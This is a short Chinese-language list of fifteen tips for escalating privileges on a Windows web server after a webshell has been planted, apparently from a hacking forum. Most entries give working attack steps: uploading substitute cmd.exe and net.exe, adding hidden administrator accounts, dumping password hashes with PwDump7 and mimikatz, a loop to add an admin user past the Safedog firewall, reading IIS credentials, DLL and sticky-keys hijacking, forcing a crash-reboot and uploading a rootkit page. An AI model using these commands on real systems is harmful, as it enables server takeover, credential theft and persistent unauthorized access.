拿下shell后提权技巧
提权的技巧分享:
1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.com cmd.txt cmd.rar等
2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe
3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia /add
4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得 到hash之后可以进行破解,建议重定向结果到保存为1.txt cmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下 也可以用mimikatz直接抓明文
5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考 虑是不是因为密码过于简单或是过于复杂了
6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输 入替换的文件路径,下面清空双引号加增加用户的命令
7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名 了,使用命令net user administrator查看管理组的名字
8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那 里,下面不变
9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后 用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功
10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp c:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe
11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网 站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录, 接着上传iispwd.vbs到网站根目录,cmd命令cmd /c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs 11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x
12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user test test [/add&@net]() localgroup administrators test /add
13.21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、 1521对应的Oracle、5631对应的pcanywhere
14.劫持提权,说到这个,想必肯定会想到lpk.dll这类工具,有时候在蛋疼怎么都 加不上账户的时候,可以试试劫持shift、添加开机启动等等思路
15.提权成功但3389端口没开,执行语句或是工具开3389失败的时候,可以上传 rootkit.asp,登陆进去就是system权限,这时候再尝试开3389希望较大